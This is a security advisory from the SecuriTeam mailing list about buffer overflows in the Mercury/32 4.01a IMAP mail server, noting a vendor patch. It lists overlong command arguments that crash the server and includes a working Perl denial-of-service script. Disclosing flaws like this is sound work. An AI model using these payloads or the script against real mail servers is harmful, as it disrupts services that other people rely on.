[NEWS] Mercury Mail Multiple Buffer Overflows

The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Mercury Mail Multiple Buffer Overflows
------------------------------------------------------------------------


SUMMARY

 <http://www.pmail.com/> Mercury is "a free, standards-based mail server 
solution, providing comprehensive, fast server support for all major 
Internet e-mail protocols. It is supplied in two versions, one hosted on 
Windows systems, the other running as a set of NLMs on Novell NetWare file 
servers".

An authenticated user can trigger several buffer overflows and possibly 
run arbitrary code on the Mercury Mail server.

DETAILS

Vulnerable Systems:
 * Mercury/32 version 4.01a

Immune Systems:
 * Mercury/32 version 4.01b and later

There are 14 vulnerable commands that can be used to cause buffer 
overflows to occur. After a successful login to the mail server, if any of 
these commands are used with an overly long argument the application 
closes resulting in a denial of service.

The commands and approximate argument lengths are as follows:
EXAMINE A x 512 \r\n
SUBSCRIBE A x 512 \r\n
STATUS A x 512 \r\n
APPEND A x 512 \r\n
CHECK A x 512 \r\n
CLOSE A x 512 \r\n
EXPUNGE A x 512 \r\n
FETCH A x 512 \r\n
RENAME A x 768 \r\n
DELETE A x 768 \r\n
LIST A x 768 \r\n
SEARCH A x 768 \r\n
CREATE A x 1024 \r\n
UNSUBSCRIBE A x 1024 \r\n

Vendor Status:
The vendor was notified an patch was released to solve the issues. For 
more details visit the patches page at:  
<http://www.pmail.com/patches.htm> http://www.pmail.com/patches.htm

Exploit Code:
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
#        Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
###########################

use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                    PeerPort => "143",
                                    Proto    => "TCP"))
{
        print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";

        sleep(1);

        print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";

        sleep(1);

        print $socket "0001 CHECK " . "A" x 512 . "\r\n";

        close($socket);

        sleep(1);

        if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                                            PeerPort => "143",
                                            Proto    => "TCP"))
        {
                close($socket);

                print "failed!\n";
        }
        else
        {
                print "successful!\n";
        }
}
else
{
        print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====


ADDITIONAL INFORMATION

The information has been provided by  <mailto:reedarvin@xxxxxxxxx> Reed 
Arvin.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@xxxxxxxxxxxxxx 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@xxxxxxxxxxxxxx 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.